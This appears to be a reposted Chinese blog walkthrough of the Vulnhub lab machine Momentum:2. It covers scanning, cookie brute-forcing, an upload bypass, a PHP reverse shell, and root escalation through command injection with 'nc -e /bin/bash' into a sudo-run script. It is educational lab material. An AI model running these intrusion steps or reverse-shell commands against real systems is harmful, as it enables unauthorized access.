看完这篇 教你玩转渗透测试靶机Vulnhub——Momentum:2

news2024/11/26 16:52:48

Vulnhub靶机Momentum:2渗透测试详解

    • Vulnhub靶机介绍:
    • Vulnhub靶机下载:
    • Vulnhub靶机安装:
    • Vulnhub靶机漏洞详解:
        • ①:信息收集:
        • ②:漏洞发现:
        • ③:文件上传漏洞利用:
        • ④:反弹Shell:
        • ⑤:SSH登入:
        • ⑥:sudo python3提权:
        • ⑦:获取FLAG:
    • Vulnhub靶机渗透总结:

Vulnhub靶机介绍:

vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。

PS:这个是Momentum系列一共有2个靶机,分别是1.2老样子需要获得root权限找到flag

Difficulty:medium

Vulnhub靶机下载:

官网下载:https://download.vulnhub.com/momentum/Momentum2.ova

Vulnhub靶机安装:

下载好了把安装包解压 然后使用Oracle VM打开即可。

Vulnhub靶机漏洞详解:

①:信息收集:

kali里使用arp-scan -l或者netdiscover发现主机

在这里插入图片描述
渗透机:kali IP :192.168.0.113 靶机IP :192.168.0.112

使用命令:nmap -sS -sV -A -n -p- 192.168.0.112

在这里插入图片描述
发现开启了8022端口 先访问一下80端口老样子dirsearch、dirb扫描一下后台

在这里插入图片描述
这里在使用gobuster 发现/owls/目录访问发现是上传文件的绝对路径

gobuster dir -u http://192.168.0.112/ -x html,php,bak,txt --wordlist /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt  

在这里插入图片描述

②:漏洞发现:

扫描出来发现了一个/js/源码 和dashboard.html上传点

在这里插入图片描述
在这里插入图片描述

在这里插入图片描述
这边先随便测试一下发现可以上传txt 但是不能传php被过滤了
这里可以通过抓包修改 返回结果为1说明上传成功

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
这里发现还有备份文件ajax.php.bak下载查看

在这里插入图片描述

   //The boss told me to add one more Upper Case letter at the end of the cookie
   if(isset($_COOKIE['admin']) && $_COOKIE['admin'] == '&G6u@B6uDXMq&Ms'){

       //[+] Add if $_POST['secure'] == 'val1d'
        $valid_ext = array("pdf","php","txt");
   }
   else{

        $valid_ext = array("txt");
   }

   // Remember success upload returns 1 

大概的意思就是cookie最后以为需要爆破 ,然后需要添加cookie字段 名称为admin
且添加POST 数据 secure =valid 都满足 就能上传 pdf php txt 文件

③:文件上传漏洞利用:

首先打开bp抓包上传php-reverse-shell(改为kali监听ip)填写cookie值 和post数据值
然后发送到Intruder(爆破模块-狙击手模式)可以手动添加26个英文单词大写字母
也可以使用kali字典crunch生成字典 当回显返回为1时就是爆破结果。很显然 这里是R

crunch 1 1 -t , >> pass.txt  #生成26个大写字母

cookie: admin=&G6u@B6uDXMq&Ms

Content-Disposition: form-data; name="secure"; #复制粘贴到bp里面
val1d

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

④:反弹Shell:

然后我们再去上传成功的目录进行查看有个新的 直接 nc-lvvp 1234 监听 双击运行 回弹shell

在这里插入图片描述
在这里插入图片描述
老样子python交互 python3 -c 'import pty; pty.spawn("/bin/bash")'

然后查看权限 id whoami/home/athena 下发现了第一个flag

在这里插入图片描述

⑤:SSH登入:

然后查看密码文件Asterisk(✳得意思)通过分析可以得到账号密码为:athena/myvulnerableapp*

在这里插入图片描述
在这里插入图片描述

⑥:sudo python3提权:

sudo -l 查看有个root权限可以执行得python文件进行查看

在这里插入图片描述
来简单分析一下啥意思:定义了一个seed 然后需要输入 脚本为了回显输出,会去执行 bash 命令
我们将反弹root权限的shell命令存入seed变量执行 就可以提权为root

在这里插入图片描述

sudo -u root /usr/bin/python3 /home/team-tasks/cookie-gen.py #执行python文件
nc -lvvp 6666 #本地监听
;nc -e /bin/bash 192.168.0.113 6666; #输入回弹命令

在这里插入图片描述

⑦:获取FLAG:

在这里插入图片描述

至此至此获取到了flag,本篇文章渗透结束 感谢大家的观看!!

Vulnhub靶机渗透总结:

1.信息收集arp-scan -l 获取ip地址 和端口信息 web扫描工具:nikto,dirsearch,dirb,dirbuster,whatweb,等 查看F12源码信息
2.BurpSuite爆破cookie 以及字典crunch得生成
3.sudo -l pyton3提权

Momentum系列得第2个靶机又完结啦,学习到了很多知识点又是收获满满的一天(耶耶耶!)
最后创作不易,希望对大家有所帮助 喜欢的话麻烦大家给个一键三连 你的开心就是我最大的快乐!!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/993101.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

【C++基础】8. 函数

文章目录 【 1. 函数的定义 】【 2. 函数声明 】【 3. 调用函数 】【 4. 函数参数 】4.1 传值调用4.2 指针调用4.3 引用调用 【 5. 形参默认值 】【 6. lambda函数 】 函数是一组一起执行一个任务的语句。每个 C 程序都至少有一个函数,即主函数 main() 。可以把代码…

Fiddler工具使用汇总

Fiddler工作原理 fiddler作为一个代理服务器,跟浏览器建立连接之后,浏览器像目标服务器发送的请求都会经过fiddler代理,所以fiddler可以捕获到http(s)请求,从而可以解释、分析、甚至重写发出去的http&…

[De1CTF 2019]SSRF Me | BUUCTF

根据题目名我们知道这是一道SSRF的题目 它允许攻击者在受害服务器上发起未经授权的网络请求 分析 在buuctf上有一个提示 也就是说flag在 网站的flag.txt 访问主页 很明显是段flask代码 格式化后 from flask import Flask, request # 导入Flask和request模块 import sock…

设备管理系统的优势是什么?设备管理系统对企业运营管理有什么帮助?

传统的设备报修维护方式存在一些问题,例如指派传递速度慢和故障信息不准确等。然而,使用设备管理系统就可以轻松地解决这些问题,并且报修全流程只需短短的30秒。设备管理系统具有许多优势,首先它支持多种渠道的报修,包…

《TCP/IP网络编程》阅读笔记--进程间通信

目录 1--进程间通信 2--pipe()函数 3--代码实例 3-1--pipe1.c 3-2--pipe2.c 3-3--pipe3.c 3-4--保存信息的回声服务器端 1--进程间通信 为了实现进程间通信,使得两个不同的进程间可以交换数据,操作系统必须提供两个进程可以同时访问的内存空间&am…

初出茅庐的小李博客之数制与编码知识

模拟量与数字量: 数字量和模拟量是两种用于表示和处理不同类型数据的概念,常见于电子和计算机系统中。它们在信号处理、传感器技术、通信和控制系统中有不同的应用。 1. 数字量(Digital): 数字量是离散的&#xff0…

06文本搜索工具——grep以及正则表达式

一、grep工具的使用 可以通过返回状态码判断文件有没有这个数据,有状态码为0,没有为1。文件不存在状态码为2 -o: 二、正则表达式 1、基本正则表达式 .为匹配任意字符,..两个两个匹配任意字符,...三个三个匹配任意字符 …

群拼团接龙小程序源码功能和开发

针对微信群开发的拼团接龙小程序,有点快团团的味道。是做私域非常不错的一款小程序。 小程序基于Uniapp开发,目前适配了微信小程序。 接龙: 在小程序中可以创建自定义接龙,不需要复杂的申请流程。 商品发布: 接龙…

模板测试和深度测试在cocoscreator中的应用

模板测试(Stencil Test): 当片段着色器处理完一个片段之后,模板测试(Stencil Test)会开始执行,和深度测试一样,它也可能会丢弃片段。接下来,被保留的片段会进入深度测试,它可能会丢弃更多的片段。模板测试…

React 开发一个移动端项目(1)

技术栈: 项目搭建:React 官方脚手架 create-react-appreact hooks状态管理:redux 、 redux-thunkUI 组件库:antd-mobileajax请求库:axios路由:react-router-dom 以及 historyCSS 预编译器:sass…

Web开发后端总结

Web后端开发现在基本上都是基于标准的三层架构进行开发的,在三层架构当中,Controller控制器层 - 负责接收请求响应数据,Service - 业务层负责具体的业务逻辑处理,而Dao - 数据访问层也叫持久层,就是用来处理数据访问操…

第9节-PhotoShop基础课程-移动抓手缩放工具

文章目录 前言1. 移动工具1.移动工具1.自动选择(图层和组)2.显示变换控件 (Shift 变换/ Ctrl 变换)3.自由变换 Ctrl T (Shift 变换/ Ctrl 变换)4.对齐功能 2.画板工具 V1. 创建画板并作图2.导出画板 2.路…

【strcpy函数和strncpy函数的对比与模拟实现】

strcpy函数和strncpy函数的对比与模拟实现 1.strcpy函数介绍 资源来源于cplusplus网站 大致意思就是: 它的作用为: 将一个字符串复制到另一块空间地址中 的函数,‘\0’是停止拷贝的终止条件,同时也会将 ‘\0’ 也复制到目标空间…

redis集群最少使用三个主节点和使用16384个槽以及主节点数量不超过1000的原因

目录 集群最少三个主节点的原因 为什么是三个? 为什么是奇数? 16384个槽和1000个主节点 集群最少三个主节点的原因 https://redis.io/docs/management/scaling/ 官网建议,搭建 redis 集群最少三主三从。 但是这么做是出于什么考虑呢? https://workt…

02深度学习目标检测方法介绍-传统

一、目标学习的检测方法变迁及对比 “目标检测“是当前计算机视觉和机器学习领域的研究热点。从Viola-Jones Detector、DPM等冷兵器时代的智慧到当今RCNN、YOLO等深度学习土壤孕育下的GPU暴力美学,整个目标检测的发展可谓是计算机视觉领域的一部浓缩史。整个目标检测…

Python实操 PDF自动识别并提取Excel文件

最近几天,paddleOCR开发了新的功能,通过将图片中的表格提取出来,效果还不错,今天,作者按照步骤测试了一波。 首先,讲下这个工具是干什么用的:它的功能主要是针对一张完整的PDF图片,可…

EasyAVFilter代码示例之将摄像机RTSP流转成RTMP推流输出

以下是一套完整的RTSP流转RTMP推流功能的开发源码,就简简单单几行代码,就可以完成原来ffmpeg很复杂的调用流程,而且还可以集成在自己的应用程序中调用,不需要再单独一个ffmpeg的进程来调用,方法很简单: #i…

spring中的@Configuration配置类和@Component

在Spring的开发工作中,基本都会使用配置注解,尤其以Component及Configuration为主,当然在Spring中还可以使用其他的注解来标注一个类为配置类,这是广义上的配置类概念,但是这里我们只讨论Component和Configuration&…

盲盒小程序开发方案

盲盒游戏作为一种富有趣味性和收藏价的虚拟盲盒产品,近年来在游戏市场中备受关注。本文将深入探讨盲盒游戏的开发方案,从市场趋势分析、用户体验设计、商业模式选择等多个维度,为开发者提供业且有深度的思考,以帮助他们在盲盒游戏…

容器编排学习(八)卷的概述与存储卷管理

一 卷 1 容器化带来的问题 容器中的文件在磁盘上是临时存放的,这给容器中运行的重要的应用程序带来一些问题 问题1:当容器崩溃或重启的时候,kubelet 会以干净的状态(镜像的状态)重启容器,容器内的历史数据会丢失 问题2&…